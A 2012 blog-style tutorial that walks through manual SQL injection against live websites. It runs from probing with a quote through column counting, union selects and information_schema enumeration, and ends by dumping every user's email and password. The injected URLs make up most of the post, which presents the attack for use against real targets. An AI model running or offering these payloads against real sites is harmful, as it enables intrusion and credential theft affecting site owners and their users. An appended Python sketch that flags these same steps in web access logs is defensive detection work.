Saturday 14 July 2012

Simple SQL Injection Tutorial

SQL injection
This can be performed in the Mozilla Firefox web browser.
URLs of SQL-driven websites look like this: "www.target.com/material.php?id=5"
It may also be "/image.php?id="
"/product.php?id="
and so on.
First you need to check the vulnerability of the website. For this, just add ' after the URL. Suppose the website is
www.target.com/material.php?id=5
Add ' after this URL, like
www.target.com/material.php?id=5'
then press Enter. If it shows an error page, then the website is vulnerable.
Now let's start the real job.
Now you have to find the number of columns. For this, add the following to the URL:
www.target.com/material.php?id=-5 order by 1--
www.target.com/material.php?id=-5 order by 2--
www.target.com/material.php?id=-5 order by 3--
www.target.com/material.php?id=-5 order by 4--
www.target.com/material.php?id=-5 order by 5--
Check until an error page appears. Now union select all the columns. Suppose I get an error page on 7, so I will add this to the URL:
www.target.com/material.php?id=-5 union select all 1,2,3,4,5,6,7--
After this, the web page will show the column numbers which will be used further on. Suppose I got 3 and 4; then I will choose the column which is in bold font. Suppose it is 3.
Now you have to check the version. Note: if the version is smaller than 5 you have to guess the table name, which is very difficult, and if the version is greater than or equal to 5 you don't need to guess the table name.
To check the version, just add the following:
www.target.com/material.php?id=-5 union select all 1,2,@@version,4,5,6,7--
Now find the database name. For this, add the following:
www.target.com/material.php?id=-5 union select all 1,2,database,4,5,6,7--
Now find the table names. For this:
www.target.com/material.php?id=-5 union select all 1,2,table_name,4,5,6,7 from information_schema.tables--
If you see only "character_sets" as the table name, do the following:
www.target.com/material.php?id=-5 union select all 1,2,group_concat(table_name),4,5,6,7 from information_schema.tables--
Now you get a list of table names, like users, admin, user_info, etc. Choose the table name. Suppose I choose "users" in my case. Now find the column names. For this:
www.target.com/material.php?id=-5 union select all 1,2,column_name,4,5,6,7 from information_schema.columns where table_name=users--
If an error page appears, then you have to change the table name to MySQL char. For this you have to download HackBar. Remember, HackBar is an add-on for Firefox; you cannot perform this in any other browser.
To download HackBar for Firefox, go to the following link:
https://addons.mozilla.org/en-US/firefox/addon/hackbar/
And if an error page appears again, then just add "group_concat" in the URL, like this:
www.target.com/material.php?id=-5 union select all 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where table_name=mysql char--
Now it will show you the column names of the "users" table, like "email", "password", "id", "address", "phone no.", etc.
Now choose the columns. As a hacker I know all of you will choose "email" and "password", so let's do:
www.target.com/material.php?id=-5 union select all 1,2,group_concat(email,0x3a,password),4,5,6,7 from users--
Done. It will show all the emails and their passwords.
Hope you all like it!
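
Each step of the walkthrough above puts a distinctive query string into the web server's access log. The Python sketch below is an added example, not part of the original post: it tags requests with the step they correspond to and lists clients that progress through several steps. The log lines (combined log format), IP addresses and stage names are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, unquote_plus

# Stage names are made up for this example; each regex matches one step of the walkthrough.
STAGES = [
    ("quote_probe", re.compile(r"=-?\d+\s*'")),
    ("column_count", re.compile(r"\border\s+by\s+\d+")),
    ("union_select", re.compile(r"\bunion\s+(all\s+)?select\b")),
    ("schema_enum", re.compile(r"\binformation_schema\.(tables|columns)\b")),
    ("data_dump", re.compile(r"\bgroup_concat\s*\(.*\bfrom\s+(?!information_schema)\w+")),
]
# Captures the client IP and the request target of a combined-log-format line.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*"')

# Constructed sample log: two ordinary visitors and one client following the steps above.
T = "[14/Jul/2012:10:00:00 +0000]"
SAMPLE_LOG = [
    f'198.51.100.4 - - {T} "GET /material.php?id=5 HTTP/1.1" 200 5120',
    f'203.0.113.7 - - {T} "GET /material.php?id=5%27 HTTP/1.1" 500 312',
    f'203.0.113.7 - - {T} "GET /material.php?id=-5%20order%20by%207-- HTTP/1.1" 500 312',
    f'203.0.113.7 - - {T} "GET /material.php?id=-5+UNION+SELECT+ALL+1,2,3,4,5,6,7-- HTTP/1.1" 200 4800',
    f'203.0.113.7 - - {T} "GET /material.php?id=-5%20union%20select%20all%201,2,group_concat(table_name),4,5,6,7%20from%20information_schema.tables-- HTTP/1.1" 200 6100',
    f'203.0.113.7 - - {T} "GET /material.php?id=-5%20union%20select%20all%201,2,group_concat(email,0x3a,password),4,5,6,7%20from%20users-- HTTP/1.1" 200 7300',
    f'198.51.100.9 - - {T} "GET /search.php?q=union+station+select+menu HTTP/1.1" 200 2048',
]

def stages_by_client(lines):
    """Return {client_ip: [stage names, in the order first seen]} for clients with any hit."""
    seen = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line in the expected format
        client, target = m.groups()
        # Decode %20, %27 and +, then normalise case and whitespace before matching.
        query = " ".join(unquote_plus(urlsplit(target).query).lower().split())
        for name, pattern in STAGES:
            if name not in seen[client] and pattern.search(query):
                seen[client].append(name)
    return {c: s for c, s in seen.items() if s}

def suspicious_clients(lines, min_stages=2):
    """Clients whose requests match at least min_stages different steps."""
    return sorted(c for c, s in stages_by_client(lines).items() if len(s) >= min_stages)

if __name__ == "__main__":
    print(stages_by_client(SAMPLE_LOG), suspicious_clients(SAMPLE_LOG))
```

A single matching request can be noise; a client that moves from a quote probe to column counting to schema enumeration is the pattern worth alerting on.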
